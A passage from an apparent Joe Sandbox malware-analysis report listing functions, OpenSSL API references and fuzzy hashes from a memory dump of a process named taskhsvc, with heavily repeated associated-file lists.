                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: T_free__stack_chk_failmemcmp
                                                            • String ID:
                                                            • API String ID: 3484743277-0
                                                            • Opcode ID: 79195c8247d7972d3c2bad2d33e5b0dbc6144f4cf36315ff532d9cc7321ca7c3
                                                            • Instruction ID: 4371f4341ef7bb2a82b11e9ac67862f54b957e45b47010bef968166b0d623688
                                                            • Opcode Fuzzy Hash: 79195c8247d7972d3c2bad2d33e5b0dbc6144f4cf36315ff532d9cc7321ca7c3
                                                            • Instruction Fuzzy Hash: 985151326092158FDB14CF29C5C0B0AF7F1BB8A318F699A69E954CB701D336E942CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEF0E90 Relevance: 10.6, APIs: 7, Instructions: 143COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CEF1007
                                                            • ASN1_TYPE_get_octetstring.LIBEAY32 ref: 6CEF104E
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_get_octetstring__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2759952882-0
                                                            • Opcode ID: 033d3060bc5636b8910c709adc2fd7780153bd7fbcf83ca3776954de99599810
                                                            • Instruction ID: 0b2fe51c764d0f5f717c6de5d3c20c7b1ecdff48fd6baba60be9b38860a37eeb
                                                            • Opcode Fuzzy Hash: 033d3060bc5636b8910c709adc2fd7780153bd7fbcf83ca3776954de99599810
                                                            • Instruction Fuzzy Hash: 3051C5B26097458FD710CF69C58064BB7F1FF8A368F624A1DE6A447B40D332E946CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF5AF30 Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sk_num.LIBEAY32(?,?,?,?,?,?,00000000,?,?,00000000,6CF5B266), ref: 6CF5AF4F
                                                            • sk_value.LIBEAY32(?,?,?,?,?,?,00000000,?,?,00000000,6CF5B266), ref: 6CF5AF69
                                                            • sk_num.LIBEAY32(?,?,?,?,?,?,00000000,?,?,00000000,6CF5B266), ref: 6CF5AF7C
                                                            • sk_num.LIBEAY32(?,?,?,?,?,?,00000000,?,?,00000000,6CF5B266), ref: 6CF5AF94
                                                            • sk_value.LIBEAY32(?,?,?,?,?,?,00000000,?,?,00000000,6CF5B266), ref: 6CF5AFAA
                                                            • sk_num.LIBEAY32(?,?,?,?,?,?,00000000,?,?,00000000,6CF5B266), ref: 6CF5AFC2
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sk_num$sk_value
                                                            • String ID:
                                                            • API String ID: 354181917-0
                                                            • Opcode ID: 6d9ff3dd262567ec9d8966423a7dd6b9c9773b80c60822b1614002ae2be2367a
                                                            • Instruction ID: 780d2c4248a9df1eaf87173703cfbc8a87b84462ac3e1f4925dc16433c329bfc
                                                            • Opcode Fuzzy Hash: 6d9ff3dd262567ec9d8966423a7dd6b9c9773b80c60822b1614002ae2be2367a
                                                            • Instruction Fuzzy Hash: BB316E756056058FD7109F75C4C076BB3F0AB68308FA6492CE7A5C7B00E731E865DBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF3A8A0 Relevance: 10.6, APIs: 7, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: afa9a056e76f040ccc093820b0ec8006a18a90d0ed052e83d2901c4d42514cdc
                                                            • Instruction ID: c1db2da6f9a29defb05ac9abc20c65130b2065288060654785bf4dd2d4b2783c
                                                            • Opcode Fuzzy Hash: afa9a056e76f040ccc093820b0ec8006a18a90d0ed052e83d2901c4d42514cdc
                                                            • Instruction Fuzzy Hash: 2841DB356146409FDB10EF69C680A0BB7F1FB89318F46DA5CEAA8DB305D334E9058F96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF78410 Relevance: 10.6, APIs: 7, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 7960f7f2c172abf422e1255c826e9c93084f09242184392308745f4e2f30fa4d
                                                            • Instruction ID: 58e5ea450ea97cc18dc4f8cd8b42fb3365fc5c2804f9ca8d552a90a08cc633e6
                                                            • Opcode Fuzzy Hash: 7960f7f2c172abf422e1255c826e9c93084f09242184392308745f4e2f30fa4d
                                                            • Instruction Fuzzy Hash: A6314F716186008FDB10DF29D980A5BBBF1FB89318F42895DE6A49B740E735E904CFA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF48CC0 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NCONF_get_section.LIBEAY32 ref: 6CF48D97
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: F_get_section
                                                            • String ID: A$DER:
                                                            • API String ID: 2206488356-1830918027
                                                            • Opcode ID: 6a2f089fab0a5d4f72b1997e659e7d9b42b4ba3f3c497310a475a474546ed83f
                                                            • Instruction ID: 5d1528bb9bb2cd3a8d69b2266f9849f18726ed5ed504ccbbeeb040ca17b75460
                                                            • Opcode Fuzzy Hash: 6a2f089fab0a5d4f72b1997e659e7d9b42b4ba3f3c497310a475a474546ed83f
                                                            • Instruction Fuzzy Hash: DD21E4B16097018FD740EF69C48066BBBF0AF98358F11892EE998C7B51E774D885CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF48E30 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NCONF_get_section.LIBEAY32 ref: 6CF48F07
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: F_get_section
                                                            • String ID: A$DER:
                                                            • API String ID: 2206488356-1830918027
                                                            • Opcode ID: f343df614e8ba2ffed2b1716be059d73f472a6bbab4604ef68198c1074239db6
                                                            • Instruction ID: 2741ff1790d37f0b4ceb06a83f4a376525d4f7ff546333d6ed6ff0cf42359c97
                                                            • Opcode Fuzzy Hash: f343df614e8ba2ffed2b1716be059d73f472a6bbab4604ef68198c1074239db6
                                                            • Instruction Fuzzy Hash: 882105B16087028FD340EF69C08065FBBE1AB88368F11892EE998C7751D775D845CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF06FE0 Relevance: 10.6, APIs: 7, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_print_exN1_item_freeX509___stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2718718610-0
                                                            • Opcode ID: e2d7f0c5a9c6c351c02f85b5a6bf5f877ddf8e764b5376d17e1bd3a7363cff2a
                                                            • Instruction ID: d0e28ed230d2a67e571e594f76b65f3d43991ad2f2b1835cf82595f14fe0cd55
                                                            • Opcode Fuzzy Hash: e2d7f0c5a9c6c351c02f85b5a6bf5f877ddf8e764b5376d17e1bd3a7363cff2a
                                                            • Instruction Fuzzy Hash: B031A475A196419FCB10DF29C680A4BBBF1BB89718F02991DEAA4DB700D730E9059F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF585C0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
